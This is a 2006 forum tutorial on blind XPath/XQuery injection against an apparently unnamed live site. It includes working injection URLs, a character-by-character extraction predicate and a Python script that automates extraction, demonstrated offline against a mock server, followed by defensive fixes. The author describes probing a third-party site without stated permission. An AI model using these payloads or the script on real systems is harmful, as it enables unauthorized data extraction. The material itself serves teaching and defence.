XQuery is safe?
Posted by rhican - Friday February 24 @ 23:20
Cat: Bugs

Some of you will have already heard of XML databases. It's a newish field of research in the database world, and it hasn't been used much yet: not all of the standards are finalised, and the supporting software isn't really stable, robust or scalable...at least not in my experience.

However, since PHP/SQL is by default quite flawed in the security department, the XML database world often profiles itself as having better security. In several fields and several implementations this is surely true. However, some of its security is based on obscurity, since few people know about it.

So in this article I'll show that it is possible to 'exploit' a website that uses XQuery.

Some of you will have heard me complain over the last few weeks about how I couldn't get it to work right, so I was surprised when I found a website actually using this technology.

However, as I already explained, it is rather annoying to learn: it is a functional programming 'language' with a non-intuitive syntax (imho)...

So how does it work:
- Your data is in XML files (something like HTML: <a>something<m p="5">hello</m></a>)
- You query this XML data with XQuery (think of it as SQL for XML files)
- XPath is part of XQuery (you locate data in the XML tree using something resembling Unix paths)

I will try to keep explaining it as I go along, but if you want to know more you can always check the W3C specifications (although they aren't final yet) at http://www.w3.org/TR/xquery/ and http://www.w3.org/TR/xpath. The latter is the most important one for what follows.

Back to our example.
The URL of a normal page on this site is
Code:
(url)?pid=t64
If you add a ' to the end of the URL (the same thing you would do to check for SQL injection), you get this error:
Quote:
The following error has occured: javax.servlet.jsp.JspException: XQUERY_PARSE_ERROR: line 1: unexpected end of input.

Wow, that's really informative: a plaintext error message, and one that tells us our parameter is pasted straight into an XQuery expression. If this was a SQL error everybody would be all over it trying to exploit it. But how does it work with XQuery?

What we want at this stage is access to the database: if passwords were stored there, it would be a severe security risk. This site doesn't appear to store any, so this is just a proof of concept, which is why I release it to the public.

In order to get access to the database we need one of the following two things:
- Make the webserver output the data we want to have
- Make the server give boolean (yes/no) responses to queries (like with blind SQL injection)

Here's a URL that works
Code:
(url)?pid=t53']['a'%20eq%20'a
Here's a URL that doesn't work
Code:
(url)?pid=t53']['b'%20eq%20'a

So basically everything after pid=t53 is evaluated by the server as an extra XPath predicate: 'a' eq 'a' is true and 'b' eq 'a' is false, so we get a yes or no response.

Just like with SQL we can now explore the entire database. By adding an extra pair of [] between the two predicates of the previous URLs we can add an extra condition.
For example:
Code:
(url)?pid=t53'][fn:abs(2)=1]['a'%20eq%20'a
(fn:abs(2)=1 is false, so this one gives the "doesn't work" response; fn:abs(2)=2 would give the "works" one.)

So we can use the functions that are native to XPath; you can find a listing here: XPath functions

In SQL we would want to get the table names first. In XML there aren't any tables, just elements. I'll show you how to get the name of the parent element. This might be a little abstract, so look at it as a Unix directory tree: every tag (something like <store></store>) is a folder, a folder can contain more folders, and at any given moment the query is positioned somewhere in that tree (the context node). We want to know the name of the parent of that node, for example.

Here is how I would get the first letter:
Code:
(url)?pid=t53'][fn:string-to-codepoints(fn:substring(./../name(),1,1))>67]['a'%20eq%20'a

"./../name()" translates as "the name of my parent"; fn:substring(...,1,1) takes its first character and fn:string-to-codepoints turns that character into its numeric code point.
The other functions are described on the page referenced above.

">67" is just a yes-or-no question to the DB (67 is the code point of 'C'). Repeating it with different numbers narrows the letter down, and then you move on to position 2, 3 and so on.

All this was done in XPath, you could use the full functionality of XQuery by adding ", XQUERY stuff," in between, but I couldn't get it to work yet.
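The following script is an added example, not code from the original post or from the site it describes. It automates the yes/no oracle above and goes a step beyond the post: instead of one letter it recovers the whole parent element name, finding the length first so that the end of the string is not confused with a code point of 0 (fn:substring past the end returns "", and fn:string-to-codepoints("") is an empty sequence that compares false against everything). The server-side query shape //page[@id='<pid>'], the MockServer stand-in and the parent name "articles" are assumptions made so the script runs offline; against a real target you would replace MockServer.oracle with an HTTP function that tells the "works" and "doesn't work" responses apart.

```python
"""Blind XPath injection: drive the yes/no oracle from the post automatically."""
import re
from typing import Callable

TARGET = "./../name()"   # the expression the post reads back: name of the parent element
PID = "t53"              # a page id that exists, as in the post


def build_query(pid: str) -> str:
    """Assumed server-side concatenation behind '?pid=' (not taken from the site)."""
    return "//page[@id='" + pid + "']"


def payload(predicate: str, pid: str = PID) -> str:
    """Injection shape from the post: t53'][<predicate>]['a' eq 'a
    The server's own trailing '] closes the last predicate for us."""
    return f"{pid}'][{predicate}]['a' eq 'a"


def length_predicate(n: int) -> str:
    return f"fn:string-length({TARGET}) > {n}"


def char_predicate(pos: int, n: int) -> str:
    # pos is 1-based, as fn:substring counts; one character -> one code point
    return f"fn:string-to-codepoints(fn:substring({TARGET},{pos},1)) > {n}"


def bsearch_gt(ask: Callable[[int], bool], lo: int, hi: int) -> int:
    """Find x in [lo, hi] using only answers to 'is x > n?' (about log2 queries)."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(oracle: Callable[[str], bool], pid: str = PID,
            max_len: int = 64, max_cp: int = 0x7F) -> str:
    """Recover the whole string TARGET evaluates to, length first, then each
    character by binary search on its code point. Assumes ASCII names (max_cp)."""
    length = bsearch_gt(lambda n: oracle(payload(length_predicate(n), pid)), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        cp = bsearch_gt(lambda n, p=pos: oracle(payload(char_predicate(p, n), pid)), 0, max_cp)
        chars.append(chr(cp))
    return "".join(chars)


class MockServer:
    """Constructed stand-in for the JSP page so the script runs offline.

    It only understands the two predicate shapes this script sends and answers
    them against a chosen parent element name (the 'secret' we read back)."""
    QUERY = re.compile(r"//page\[@id='t53'\]\[(.+)\]\['a' eq 'a'\]")
    LEN = re.compile(r"fn:string-length\(\./\.\./name\(\)\) > (\d+)")
    CHAR = re.compile(r"fn:string-to-codepoints\(fn:substring\(\./\.\./name\(\),(\d+),1\)\) > (\d+)")

    def __init__(self, parent_name: str = "articles"):
        self.parent_name = parent_name
        self.queries = 0   # how many requests the extraction needed

    def oracle(self, pid: str) -> bool:
        """True = the normal page, False = XQUERY_PARSE_ERROR or an empty result."""
        self.queries += 1
        q = build_query(pid)
        if q == build_query(PID):
            return True                       # the untouched page
        m = self.QUERY.fullmatch(q)
        if not m:
            return False                      # e.g. a stray ' -> parse error
        pred = m.group(1)
        lm = self.LEN.fullmatch(pred)
        if lm:
            return len(self.parent_name) > int(lm.group(1))
        cm = self.CHAR.fullmatch(pred)
        if cm:
            pos, n = int(cm.group(1)), int(cm.group(2))
            ch = self.parent_name[pos - 1:pos]   # "" beyond the end, like fn:substring
            return bool(ch) and ord(ch) > n      # empty sequence > n is false
        return False


if __name__ == "__main__":
    srv = MockServer("articles")
    print(extract(srv.oracle), "recovered in", srv.queries, "requests")
```

Each character costs about seven requests in the ASCII range, so a whole element name comes back in well under a hundred; the same loop works for any XPath expression you put in TARGET, not just the parent name. On the defensive side the fix is the same as for SQL: never concatenate the parameter into the query text. XQuery has external variables for exactly this (declare variable $pid external; and then //page[@id = $pid]), so the value is bound as data and never parsed; on top of that, check pid against the format you expect and don't send the raw JspException text to the client, since that message is what told us the parameter was being parsed in the first place.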

Rhican

» Comments


XaVeRiuS on 25 February 2006 22:30

Nice article :)
I had never heard of (well, how shall I call it) XQuery injections before... Why don't you create a challenge on it?

rhican on 26 February 2006 20:48

I'll think about it..

cake on 1 March 2006 13:00

nice text rhican, it's always nice to read some good texts

cracker-net on 22 April 2006 00:43

I don't know anything about XQuery and I understood it.
Really informative. (NOT sarc ;) )
